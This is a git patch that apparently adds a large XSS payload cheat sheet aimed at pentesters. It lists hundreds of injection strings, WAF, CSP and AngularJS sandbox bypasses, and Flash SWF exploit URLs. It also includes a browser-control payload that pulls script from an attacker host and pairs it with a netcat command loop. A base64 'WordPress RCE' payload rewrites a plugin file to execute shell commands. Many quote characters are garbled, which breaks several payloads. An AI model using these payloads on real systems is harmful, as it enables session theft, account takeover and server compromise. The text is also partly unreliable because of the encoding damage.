+
+
+
+
+
+ ![]()
+ exp/*
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+Flash SWF XSS
+
+ ZeroClipboard: ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf
+
+ plUpload Player: plupload.flash.swf?%#target%g=alert&uid%g=XSS&
+
+ plUpload MoxiePlayer: Moxie.swf?target%g=confirm&uid%g=XSS (also works with Moxie.cdn.swf and other variants)
+
+ FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert1
+
+ videoJS: video-js.swf?readyFunction=confirm and video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29
+
+ YUI "io.swf": io.swf?yid=\"));}catch(e){alert(document.domain);}//
+
+ YUI "uploader.swf": uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<
+
+ Open Flash Chart: open-flash-chart.swf?get-data=(function(){alert(1)})()
+
+ AutoDemo: control.swf?onend=javascript:alert(1)//
+
+ Adobe FLV Progressive: /main.swf?baseurl=asfunction:getURL,javascript:alert(1)// and /FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//
+
+ Banner.swf (generic): banner.swf?clickTAG=javascript:alert(document.domain);//
+
+ JWPlayer (legacy): player.swf?playerready=alert(document.domain) and /player.swf?tracecall=alert(document.domain)
+
+ SWFUpload 2.2.0.1: swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//
+
+ Uploadify (legacy): uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf
+
+ FlowPlayer 3.2.7: flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf
+
+
+
+a="get";
+b="URL(\"";
+c="javascript:";
+d="alert('XSS');\")";
+eval(a+b+c+d);
+
+
+XML Schema
+
+
+ XSS
+
+]]>
+
+
+
+<IMG SRC="javascript:alert('XSS')">
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+XSS'\x22"%22>4<%\u0022/*
+
+
+
+
+
+
+
+alert("XSS")'); ?>
+
+
+
+Redirect 302 /test.jpg http://test.com/admin.asp&deleteuser
+
+
+ +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
+
+
+PT SRC="http://test.com/xss.js">
+XSS
+XSS
+XSS
+XSS
+
+%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E
+
+<iframe src=http://test.de>
+
+<iframe src=http://test.de>
+
+PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+<\x00img src='1' onerror=alert(0) />
+
+alert(1)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ì>![]( "test-xss")
+
+
+Firefox (\x09, \x0a, \x0d, \x20)
+Chrome (Any character \x01 to \x20)
+
+
+
+alert(0)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+Joker
+Joker
+Joker
+Joker
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+< = %C0%BC = %E0%80%BC = %F0%80%80%BC
+> = %C0%BE = %E0%80%BE = %F0%80%80%BE
+' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
+" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
+
+
+%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
+
+
+
++ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
+
+
+
+%uff1cscript%uff1ealert(1)%uff1c/script%uff1e
+
+
+
+%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+';
+
+
+
+'); }
+
+
+
+
+ (IE)
+ (Firefox, Chrome, Safari)
+ (Firefox, Chrome, Safari)
+
+
+http://test.com/something.xxx?a=val1&a=val2
+ASP.NET a = val1,val2
+ASP a = val1,val2
+JSP a = val1
+PHP a = val2
+
+
+
+ (Firefox)
+
+http://test.com/something.jsp?inject=#alert(1)
+
+
+
+
+
+
+
+
+
+ ">
+
+xxs link
+
+<![CDATA[
+
+<a onmouseover=alert(document.cookie)>xxs link</a>
+<a onmouseover=alert(document.cookie)>%20<h>xxs link<a><iframe src="c" onload=alert(1)>
+
+<div onactivate=alert('XSSTEST') id=xss style=overflow:scroll>
+
+Ij48IjxpbWcgc3JjPSJ4Ij4lMjAlMjA+IjxpZnJhbWUgc3JjPWE+JTIwPGlmcmFtZT4=
+
+
+
+
+String Char Eval
+ {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
+
+ 'a'.constructor.prototype['char\u0041t']
+
+ 'a'.constructor.prototype['char\u0041t']=''.concat;
+
+{{'a'.constructor.prototype['char\u0041t']=''.concat;
+$eval("x='\"+(y='if(!window\\u002?x)alert(window\\u002ex=1)')+eval(y)+\"'");}}
+
+
+{{
+ ({}.toString()).constructor.prototype.charAt=[].join;
+ $eval(({}.toString()).constructor.fromCharCode(120,61,49,125,32,125,32,125,59,97,108,101,114,116,40,49,41,47,47))
+}}
+
+
+
+{{
+ x=toString();x.constructor.prototype.charAt=x.constructor.prototype.concat;
+ $eval(x.constructor.fromCharCode(120,61,49,125,32,125,32,125,59,97,108,101,114,116,40,49,41,47,47))
+}}
+
+
+
+t=o.anchor(true);//<a name="true">[object Undefined]</a>
+
+
+
+{{
+c=[];
+o=toString();
+t=o.anchor(true);
+f=o.anchor(false);
+c.push(o[5]);
+c.push(o[1]);
+c.push(t[3]);
+c.push(f[12]);
+c.push(t[9]);
+c.push(t[10]);
+c.push(t[11]);
+c.push(o[5]);
+c.push(t[9]);
+c.push(o[1]);
+c.push(t[10]);
+a=c.join([]);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[c.join([])].fromCharCode(97,108,101,114,116,40,49,41))()
+}}
+
+
+
+<!-- If you control the name, will work on Firefox in any context, will fail in chromium in DOM -->
+<svg/onload=eval(name)>
+
+<!-- If you control the URL, Safari-only -->
+<iframe/onload=write(URL)>
+
+<!-- If you control the URL -->
+<svg/onload=eval(`'`+URL)>
+
+<!-- If you controll the name, but unsafe-eval not enabled -->
+<svg/onload=location=name>
+
+<!-- Just a casual script -->
+<script/src=//?.?></script>
+
+<!-- If you control the name of the window -->
+<iframe/onload=src=top.name>
+
+<!-- If you control the URL -->
+<iframe/onload=eval('`'+URL)>
+
+<!-- If number of iframes on the page is constant -->
+<iframe/onload=src=top[0].name+/\?.??/>
+
+<!-- for Firefox only -->
+<iframe/srcdoc="<svg><script/href=//?.? />">
+
+<!-- If number of iframes on the page is random -->
+<iframe/onload=src=contentWindow.name+/\?.??/>
+
+<!-- If unsafe-inline is disabled in CSP and external scripts allowed -->
+<iframe/srcdoc="<script/src=//?.?></script>">
+
+<!-- If inline styles are allowed -->
+<style/onload=eval(name)>
+
+<!-- If inline styles are allowed, Safari only -->
+<style/onload=write(URL)>
+
+<!-- If inline styles are allowed and the URL can be controlled -->
+<style/onload=eval(`'`+URL)>
+
+<!-- If inline styles are blocked -->
+<style/onerror=eval(name)>
+
+<!-- Uses external script as import, doesn't work in innerHTML unless Firefox -->
+<!-- The PoC only works on https and Chrome, because ?.? checks for Sec-Fetch-Dest header -->
+<svg/onload=import(/\\?.?/)>
+
+<!-- Uses external script as import, triggers if inline styles are allowed.
+<!-- The PoC only works on https and Chrome, because ?.? checks for Sec-Fetch-Dest header -->
+<style/onload=import(/\\?.?/)>
+
+<!-- Uses external script as import -->
+<!-- The PoC only works on https and Chrome, because ?.? checks for Sec-Fetch-Dest header -->
+<iframe/onload=import(/\\?.?/)>
+
+
+HTML Context
+Tag Injection <svg onload=alert(1)>
+ì><svg onload=alert(1)//
+
+
+HTML Context
+Inline Injection ìonmouseover=alert(1)//
+ìautofocus/onfocus=alert(1)//
+
+
+Javascript Context
+Code Injection ë-alert(1)-ë
+ë-alert(1)//
+
+
+Javascript Context
+Code Injection
+(escaping the escape) \í-alert(1)//
+
+
+Javascript Context
+Tag Injection
+</script><svg onload=alert(1)>
+
+
+PHP_SELF Injection
+http://DOMAIN/PAGE.php/î><svg onload=alert(1)>
+
+
+Without Parenthesis
+<svg onload=alert`1`>
+<svg onload=alert(1)>
+<svg onload=alert(1)>
+<svg onload=alert(1)>
+
+
+Filter Bypass
+Alert Obfuscation
+(alert)(1)
+a=alert,a(1)
+[1].find(alert)
+top[ìalî+îertî](1)
+top[/al/.source+/ert/.source](1)
+al\u0065rt(1)
+top[ëal\145rtí](1)
+top[ëal\x65rtí](1)
+top[8680439..toString(30)](1)
+
+
+Body Tag
+<body onload=alert(1)>
+<body onpageshow=alert(1)>
+<body onfocus=alert(1)>
+<body onhashchange=alert(1)><a href=#x>click this!#x
+<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
+<body onscroll=alert(1)><br><br><br><br>
+<br><br><br><br><br><br><br><br><br><br>
+<br><br><br><br><br><br><br><br><br><br>
+<br><br><br><br><br><br><x id=x>#x
+<body onresize=alert(1)>press F12!
+<body onhelp=alert(1)>press F1! (MSIE)
+
+
+Miscellaneous Vectors
+<marquee onstart=alert(1)>
+<marquee loop=1 width=0 onfinish=alert(1)>
+<audio src onloadstart=alert(1)>
+<video onloadstart=alert(1)><source>
+<input autofocus onblur=alert(1)>
+<keygen autofocus onfocus=alert(1)>
+<form onsubmit=alert(1)><input type=submit>
+<select onchange=alert(1)><option>1<option>2
+<menu id=x contextmenu=x onshow=alert(1)>right click me!
+
+
+Agnostic Event Handlers
+<x contenteditable onblur=alert(1)>lose focus!
+<x onclick=alert(1)>click this!
+<x oncopy=alert(1)>copy this!
+<x oncontextmenu=alert(1)>right click this!
+<x oncut=alert(1)>copy this!
+<x ondblclick=alert(1)>double click this!
+<x ondrag=alert(1)>drag this!
+<x contenteditable onfocus=alert(1)>focus this!
+<x contenteditable oninput=alert(1)>input here!
+<x contenteditable onkeydown=alert(1)>press any key!
+<x contenteditable onkeypress=alert(1)>press any key!
+<x contenteditable onkeyup=alert(1)>press any key!
+<x onmousedown=alert(1)>click this!
+<x onmousemove=alert(1)>hover this!
+<x onmouseout=alert(1)>hover this!
+<x onmouseover=alert(1)>hover this!
+<x onmouseup=alert(1)>click this!
+<x contenteditable onpaste=alert(1)>paste here!
+
+
+Code Reuse
+Inline Script <script>alert(1)//
+<script>alert(1)<!ñ
+
+
+Code Reuse
+Regular Script <script src=//localhost:8080/1.js>
+<script src=//3334957647/1>
+
+
+Filter Bypass
+Generic Tag + Handler
+Encoding Mixed Case Spacers
+%3Cx onxxx=1
+<%78 onxxx=1
+<x %6Fnxxx=1
+<x o%6Exxx=1
+<x on%78xx=1
+<x onxxx%3D1 <X onxxx=1
+<x OnXxx=1
+<X OnXxx=1Doubling
+<x onxxx=1 onxxx=1 <x/onxxx=1
+<x%09onxxx=1
+<x%0Aonxxx=1
+<x%0Conxxx=1
+<x%0Donxxx=1
+<x%2Fonxxx=1
+Quotes Stripping Mimetism
+<x 1=í1íonxxx=1
+<x 1=î1?onxxx=1 <[S]x onx[S]xx=1
+
+
+[S] = stripped char or string
+<x </onxxx=1
+<x 1=î>î onxxx=1
+<http://onxxx%3D1/
+
+Generic Source Breaking
+<x onxxx=alert(1) 1=í
+
+
+Browser Control
+<svg onload=setInterval(function(){with(document)body.
+appendChild(createElement(ëscriptí)).src=í//HOST:PORTí},0)>$ while :; do printf ìj$ ì; read c; echo $c | nc -lp PORT >/dev/null; done
+
+
+Multi Reflection Double Reflection
+Single Input Single Input (script-based)
+ëonload=alert(1)><svg/1=í ë>alert(1)</script><script/1=í
+*/alert(1)</script><script>/*
+
+Triple Reflection
+Single Input Single Input (script-based)
+*/alert(1)î>íonload=î/*<svg/1=í
+`-alert(1)î>íonload=î`<svg/1=í */</script>í>alert(1)/*<script/1=í
+
+
+Multi Input Double Input Triple Input
+p=<svg/1=í&q=íonload=alert(1)>
+p=<svg 1=í&q=íonload=í/*&r=*/alert(1)í>
+
+
+Without Event Handlers
+<script>alert(1)</script>
+<script src=javascript:alert(1)>
+<iframe src=javascript:alert(1)>
+<embed src=javascript:alert(1)>
+<a href=javascript:alert(1)>click
+<math><brute href=javascript:alert(1)>click
+<form action=javascript:alert(1)><input type=submit>
+<isindex action=javascript:alert(1) type=submit value=click>
+<form><button formaction=javascript:alert(1)>click
+<form><input formaction=javascript:alert(1) type=submit value=click>
+<form><input formaction=javascript:alert(1) type=image value=click>
+<form><input formaction=javascript:alert(1) type=image src=SOURCE>
+<isindex formaction=javascript:alert(1) type=submit value=click>
+<object data=javascript:alert(1)>
+<iframe srcdoc=<svg/onload=alert(1)>>
+<svg><script xlink:href=data:,alert(1) />
+<math><brute xlink:href=javascript:alert(1)>click
+<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
+
+
+Mobile Only
+Event Handlers
+<html ontouchstart=alert(1)>
+<html ontouchend=alert(1)>
+<html ontouchmove=alert(1)>
+<html ontouchcancel=alert(1)>
+<body onorientationchange=alert(1)>
+
+
+Javascript Properties Functions
+<svg onload=alert(navigator.connection.type)>
+<svg onload=alert(navigator.battery.level)>
+<svg onload=alert(navigator.battery.dischargingTime)>
+<svg onload=alert(navigator.battery.charging)> <svg onload=navigator.vibrate(500)>
+<svg onload=navigator.vibrate([500,300,100])>
+
+
+Generic Self to Regular XSS
+<iframe src=LOGOUT_URL onload=forms[0].submit()>
+</iframe><form method=post action=LOGIN_URL>
+<input name=USERNAME_PARAMETER_NAME value=USERNAME>
+<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
+
+
+File Upload Injection in Filename
+ì><img src=1 onerror=alert(1)>.gifInjection in Metadata
+$ exiftool -Artist='î><img src=1 onerror=alert(1)>í FILENAME.jpegInjection with SVG File
+<svg xmlns=îhttp://www.w3.org/2000/svgî onload=îalert(document.domain)î/>
+
+
+Injection with GIF File as Source of Script (CSP Bypass)
+GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
+
+Google Chrome
+Auditor Bypass
+<script src=îdata:,alert(1)//
+ì><script src=data:,alert(1)//<script src=î//localhost:8080/1.js#
+ì><script src=//localhost:8080/1.js#<link rel=import href=îdata:text/html,<script>alert(1)</script>
+ì><link rel=import href=data:text/html,<script>alert(1)</script>
+<svg><animate xlink:href=#x attributeName=href values=javascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
+
+Chrome < v60 beta XSS-Auditor Bypass
+
+<script src="data:,alert(1)%250A-->
+
+Other Chrome XSS-Auditor Bypasses
+
+<script>alert(1)</script
+
+<script>alert(1)%0d%0a-->%09</script
+
+<x>%00%00%00%00%00%00%00<script>alert(1)</script>
+
+Safari XSS Vector
+
+<script>location.href;'javascript:alert%281%29'</script>
+
+XSS Polyglot
+
+jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
+
+PHP File for XHR Remote Call
+<?php header(ìAccess-Control-Allow-Origin: *î); ?>
+<img src=1 onerror=alert(1)>
+Server Log Avoidance <svg onload=eval(URL.slice(-8))>#alert(1)
+<svg onload=eval(location.hash.slice(1)>#alert(1)
+<svg onload=innerHTML=location.hash>#<script>alert(1)</script>
+
+<svg/onload=javascript:void(0)?void(0):void(0)?void(0):void(0)?void(0):void(0)?void(0):confirm(location)>
+
+
+Shortest PoC
+<base href=//0>
+
+
+$ while:; do echo ìalert(1)î | nc -lp80; done
+Portable WordPress RCE <script/src=îdata:,eval(atob(location.hash.slice(1)))//#
+#eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd
+Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w
+aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n
+X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC
+5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV
+RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE
+9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl
+wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD
+Qp4LnNlbmQoJCk=http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD
+
+
+Invisble JS Alert
+([,?,,,,??]=[]+{},[???,??,????,???,,?????,????,??????,,,?????]=[!!?]+!?+?.?)
+[??+=?+?????+??????+???+??+????+??+???+?+??][??]
+(?????+????+???+??+???+'`#JS!`')``
+
+
+Markdown XSS
+
+[a](javascript:confirm(1))
+
+[a](javascript://www.test.com%0Aprompt(1))
+
+[a](javascript://%0d%0aconfirm(1))
+
+[a](javascript://%0d%0aconfirm(1);com)
+
+[a](javascript:window.onerror=confirm;throw%201)
+
+[a]: (javascript:prompt(1))
+
+[a]:(?javascript:alert(1))
+
+
+Angular JS
+'a'.constructor.fromCharCode=[].join;
+'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
+
+{{
+'a'.constructor.prototype.charAt=[].join;
+eval('x=1} } };alert(1)//');
+}}
+
+AngularJS Template Injection based XSS
+
+1.0.1 - 1.1.5
+
+{{constructor.constructor('alert(1)')()}}
+
+1.2.0 - 1.2.1
+
+{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
+
+1.2.2 - 1.2.5
+
+{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
+
+1.2.6 - 1.2.18
+
+{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
+
+1.2.19 - 1.2.23
+
+{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
+
+1.2.24 - 1.2.29
+
+{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
+
+1.3.0
+
+{{!ready && (ready = true) && (
+ !call
+ ? $$watchers[0].get(toString.constructor.prototype)
+ : (a = apply) &&
+ (apply = constructor) &&
+ (valueOf = call) &&
+ (''+''.toString(
+ 'F = Function.prototype;' +
+ 'F.apply = F.a;' +
+ 'delete F.a;' +
+ 'delete F.valueOf;' +
+ 'alert(1);'
+ ))
+ );}}
+
+1.3.1 - 1.3.2
+
+{{
+ {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
+ 'a'.constructor.prototype.charAt=''.valueOf;
+ $eval('x=alert(1)//');
+}}
+
+1.3.3 - 1.3.18
+
+{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
+
+ 'a'.constructor.prototype.charAt=[].join;
+ $eval('x=alert(1)//'); }}
+
+1.3.19
+
+{{
+ 'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
+ $eval('x=alert(1)//');
+}}
+
+1.3.20
+
+{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
+
+1.4.0 - 1.4.9
+
+{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
+
+1.5.0 - 1.5.8
+
+{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
+
+1.5.9 - 1.5.11
+
+{{
+ c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
+ c.$apply=$apply;c.$eval=b;op=$root.$$phase;
+ $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
+ C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
+ B=C(b,c,b);$evalAsync("
+ astNode=pop();astNode.type='UnaryExpression';
+ astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
+ astNode.argument={type:'Identifier',name:'foo'};
+ ");
+ m1=B($$asyncQueue.pop().expression,null,$root);
+ m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
+ $eval('a(b.c)');[].push.apply=a;
+}}
+
+1.6.0+ (no Expression Sandbox)
+
+{{constructor.constructor('alert(1)')()}}
+
+Content Security Policy (CSP) bypass via JSONP endpoints
+
+Grab the target's CSP:
+
+curl -I http://example.com | grep 'Content-Security-Policy'
+
+
+Lightweight Markup Languages
+
+RubyDoc (.rdoc)
+
+XSS[JavaScript:alert(1)]
+
+Textile (.textile)
+
+"Test link":javascript:alert(1)
+
+reStructuredText (.rst)
+
+`Test link`__.
+
+__ javascript:alert(document.domain)
+
+Unicode characters
+
+Üáï<img src=a onerror=javascript:alert('test')>ÖâÄ
+
+
+
+Sanbox Bypasses
+{{constructor.constructor('alert(1)')()}}
+
+{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
+
+{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
+
+{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
+
+{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
+
+{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
+
+{{!ready && (ready = true) && (
+ !call
+ ? $$watchers[0].get(toString.constructor.prototype)
+ : (a = apply) &&
+ (apply = constructor) &&
+ (valueOf = call) &&
+ (''+''.toString(
+ 'F = Function.prototype;' +
+ 'F.apply = F.a;' +
+ 'delete F.a;' +
+ 'delete F.valueOf;' +
+ 'alert(1);'
+ ))
+ );}}
+
+{{
+ {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
+ 'a'.constructor.prototype.charAt=''.valueOf;
+ $eval('x=alert(1)//');
+}}
+
+{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
+ 'a'.constructor.prototype.charAt=[].join;
+ $eval('x=alert(1)//'); }}
+
+{{
+ 'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
+ $eval('x=alert(1)//');
+}}
+
+{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
+
+{{
+ c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
+ c.$apply=$apply;c.$eval=b;op=$root.$$phase;
+ $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
+ C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
+ B=C(b,c,b);$evalAsync("
+ astNode=pop();astNode.type='UnaryExpression';
+ astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
+ astNode.argument={type:'Identifier',name:'foo'};
+ ");
+ m1=B($$asyncQueue.pop().expression,null,$root);
+ m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
+ $eval('a(b.c)');[].push.apply=a;
+}}
+
+{{constructor.constructor('alert(1)')()}}
+
+
+Kona WAF (Akamai) Bypass
+
+\');confirm(1);//
+
+ModSecurity WAF Bypass Note: This kind of depends on what security level the application is set to. See: https://modsecurity.org/rules.html
+
+<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>
+
+Wordfence XSS Bypasses
+
+<meter onmouseover="alert(1)"
+
+'">><div><meter onmouseover="alert(1)"</div>"
+
+>><marquee loop=1 width=0 onfinish=alert(1)>
+
+Incapsula WAF Bypasses
+
+<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
+
+<img/src=q onerror='new Function`al\ert\`1\``'>
+
+jQuery < 3.0.0 XSS
+
+$.get('http://sakurity.com/jqueryxss')
+
+In order to really exploit this jQuery XSS you will need to fulfil one of the following requirements:
+
+ Find any cross domain requests to untrusted domains which may inadvertently execute script.
+ Find any requests to trusted API endpoints where script can be injected into data sources.
+
+URL verification bypasses (works without 	 too)
+
+javas	cript://www.google.com/%0Aalert(1)
+
+
+
+
+
+
+Signal Messenger Payloads
+http://testdomain/?p=%3Ciframe%20src="/etc/passwd"%3E%3C/iframe%3E%20PENTEST
+
+http://testdomain/?p=%3d%3Ciframe%20src=\\DESKTOP-[LOCALPATH]\Temp\rce.html%3E
+
+http://testdomain/?p=%3d%3Ciframe%20src=\\xxx.xxx.xxx.xxx\Temp\rce.html%3E
+
+http://testdomain/?p=%3Ciframe%20src="testfile.html"%3E%3C/iframe%3E%20PENTEST
+
+http://testdomain/?p=%3Ciframe%20srcdoc="<p>PENTEST</p>"%3E%3C/iframe%3E
+
+http://testdomain/?p=%3Caudio%20autoplay%20src="/usr/share/sounds/gnome/default/alerts/bark.ogg"%20type="audio/ogg"%3E%3C/audio%3E
+
+http://testdomain/?p=%3Cvideo%20autoplay%20loop%20src="/usr/share/help/C/gnome-help/figures/display-dual-monitors.webm"%20type="video/webm"%3E%3C/video%3E
+
+http://testdomain/?p=%3Cform%20method='POST'%20action='https://domain.de/url'%3E%3Cinput%20type='text'%20name='data'%20value='from_form'/%3E%3Cinput%20type='submit'/%3E%3C/form%3E
+
+
+
+
+Waf Engine Bypass
+<svg onload\r\n=$.globalEval("al"+"ert()");>
+<img onload\r\n=$.globalEval("al"+"ert()");>
+<iframe src="\\" onload\r\n=$.globalEval("al"+"ert()");>
From 5efdffb2bddd85f08d0d514162738fc6e386576b Mon Sep 17 00:00:00 2001
From: Vineet Kumar <44500552+vineetkia@users.noreply.github.com>
Date: Thu, 7 Jul 2022 00:11:58 +0530
Subject: [PATCH 2/2] Update All-XSS-Payloads-Cheat-Sheet.md
---
cheatsheets/All-XSS-Payloads-Cheat-Sheet.md | 146 ++++++++++----------
1 file changed, 73 insertions(+), 73 deletions(-)
diff --git a/cheatsheets/All-XSS-Payloads-Cheat-Sheet.md b/cheatsheets/All-XSS-Payloads-Cheat-Sheet.md
index 27a48e7..ab7fea2 100644
--- a/cheatsheets/All-XSS-Payloads-Cheat-Sheet.md
+++ b/cheatsheets/All-XSS-Payloads-Cheat-Sheet.md
@@ -1,10 +1,10 @@
-ULTIMATE CROSS SITE SCRIPTING CHEAT SHEET
+# ULTIMATE CROSS SITE SCRIPTING CHEAT SHEET
-Note: This is a technical sheet for research about directory- and path traversal attacks.
-Please continue the ultimate directory traversal cheat sheet list or contribute to update.
-This cheat sheet list goes out to assist pentesters, developers, researchers & whitehats.
+# Note: This is a technical sheet for research about directory- and path traversal attacks.
+# Please continue the ultimate directory traversal cheat sheet list or contribute to update.
+# This cheat sheet list goes out to assist pentesters, developers, researchers & whitehats.
-Tags to Trigger XSS Attacks:
+# Tags to Trigger XSS Attacks:
onclick
ondblclick
onmousedown
@@ -29,7 +29,7 @@ onreset
onselect
onMoveOn
-Brackets for Tags
+# Brackets for Tags
>"
">
<"
@@ -114,7 +114,7 @@ Pjw=
\u003c
\u003C
-XSS Strings:
+# XSS Strings:
<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
<SCRIPT>document.cookie=true;</SCRIPT>
@@ -192,7 +192,7 @@ exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.cookie=t
<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]]]><![CDATA[> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
-Restriction Bypass:
+# Restriction Bypass:
>"<iframe src=http://global-evolution.info/>@gmail.com
>"<script>alert(document.cookie)</script><div style="1@gmail.com
>"<script>alert(document.cookie)</script>@gmail.com
@@ -208,12 +208,12 @@ om.Char.Code</button></body></html>
%73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F
%73%63%72%69%70%74%3E
-Obfuscated Bypass:
+# Obfuscated Bypass:
>ì<ScriPt>ALeRt("xssOBFSbypass")</scriPt>
-XSS with close TAG to escape:
+# XSS with close TAG to escape:
>"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
>"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
>"<SCRIPT>document.cookie=true;</SCRIPT>
@@ -299,7 +299,7 @@ XSS with close TAG to escape:
javascript:alert(1)
-Others: Random
+# Others: Random
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://test.com/xss.js></SCRIPT>
@@ -410,7 +410,7 @@ perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
